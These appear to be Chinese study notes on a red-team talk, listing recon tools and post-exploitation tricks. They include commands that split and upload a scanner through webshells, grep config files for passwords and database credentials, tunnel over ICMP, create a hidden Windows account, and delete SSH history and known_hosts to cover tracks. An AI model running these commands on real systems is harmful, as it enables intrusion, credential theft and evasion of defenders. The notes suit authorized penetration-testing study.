b站学习笔记之《第二十一期听火沙龙——提高红队效率的小技巧》

《第二十一期听火沙龙——提高红队效率的小技巧》笔记

[视频链接] https://www.bilibili.com/video/av295996553/

[视频作者] 火线安全-TeamsSix

[视频时长] 29:20

[视频创建] 2022-01-24

阶段一：打点——公司域名及子域名收集

输入：公司名称

低效方式：公司内部平台管理工具，手动，python等

高效工具：

1、wgpsec/ENScan_GO: 一款基于各大企业信息API的工具，解决在遇到的各种针对国内企业信息收集难题。一键收集控股公司ICP备案、APP、小程序、微信公众号等信息聚合导出。 - https://github.com/wgpsec/ENScan_GO

优点——企业信息收集 go快 效率快。备案、股权信息搜索。1分钟 支持指定股权占比

实际使用——

2、0x727/ShuiZe_0x727: 信息收集自动化工具 - https://github.com/0x727/ShuiZe_0x727

优点——信息全

3、Xray指定扫描插件

chaitin/xray: 一款完善的安全评估工具，支持常见 web 安全问题扫描和自定义 poc | 使用之前务必先阅读文档 - https://github.com/chaitin/xray

优点——好用的插件爆破、SQL注入、XSS ，模块化使用可以防止被封ip

实际使用——列出所有插件

4、fofa信息收集

wgpsec/fofa_viewer: 用 JavaFX 编写的简单 FOFA 客户端 - https://github.com/wgpsec/fofa_viewer

优点——使用方便

实际使用——cert=“”

5、burp插件 Logger++过滤

优点——过滤类型

实际使用——排除图片、脚本、失败状态码

Response.InferredType != "PNG" AND Response.InferredType != "JPEG" AND
Response.InferredType != "GIF" AND Response.InferredType != "CSS"AND
Response.InferredType != "script" AND Response.Status != 502

阶段二：内网阶段

场景A——get shell阶段 上传大文件失败 超时

操作——

1、分割

split -b 500k fscan.exe t

2、上传分割小文件

3、合并

cat t*>fs #适用于Linux、Mac

copy /b t* fs.exe #适用于Windows

4、执行

工具——哥斯拉自带分割文件功能，冰蝎、蚁剑不支持

BeichenDream/Godzilla: 哥斯拉 - https://github.com/BeichenDream/Godzilla

rebeyond/Behinder: “冰蝎”动态二进制加密网站管理客户端 - https://github.com/rebeyond/Behinder

AntSwordProject/antSword: 中国蚁剑是一款跨平台的开源网站管理工具。AntSword is a cross-platform website management toolkit. - https://github.com/AntSwordProject/antSword

场景B——拿到一台Linux机器，获取敏感信息

操作——搜索配置文件里的账号密码、数据库连接信息

find / -regextype posix-extended -regex ".*\\.(properties|xml|cnf|yml|ini)"|xrags egrep -i " pass|pwd|jdbc

场景C——拿到一台Windows机器，获取敏感信息

操作——（命令支持比linux差 关键字数量有限 按需设置）

findstr /s /i "password" *.properties

场景D——进了内网，SSH隧道 动态转发

场景E——当内网存在策略限制，能ping通，设置内部ICMP隧道

操作——

 ./pingtunnel -type server

pingtunnel.exe -type client -l 127.0.0.1:1080 -s icmpserver_ip -sock5 1

场景F——域用户摘要信息

操作——

 wmic useraccount get /all

账号密码信息可能有明文直接存储在那

场景G——一键添加隐藏账户

工具——wgpsec/CreateHiddenAccount: A tool for creating hidden accounts using the registry || 一个使用注册表创建隐藏帐户的工具 - https://github.com/wgpsec/CreateHiddenAccount

域控情况下只创建用户，不修改注册表

 CreateHiddenAccount.exe -u teamssix -p Passw0rd

蓝队也可以用，检查隐藏账户和删除。

其他

1、内网中领导电脑上线可能不会下线

2、使用ssh或scp后，不仅记得删除hostory记录还要删除known_hosts里的记录

3、如果目标存在账号封禁策略，在使用fscan的时候可以加上 -pwd 123456 即只用尝试爆破一次

4、在没有域主机的环境中找域控，除了通过nbtscan扫描外，还可以通过端口开放情况来判断，一般开放

53 DNS、

88 Kerberos

389 LDAP

端口大概率是域名控

5、使用MSF连接windows终端遇到乱码的解决方法，使用chcp 65001 命令可将终端修改成UTF-8编码

6、mac用户可以为常用软件创建APP软件，一键可以打开java jar

Q&A

m1芯片有很多坑

扩展资料：

浅谈红队中的权限维持（连载第三篇） - 火线 Zone-安全攻防社区 - https://zone.huoxian.cn/d/860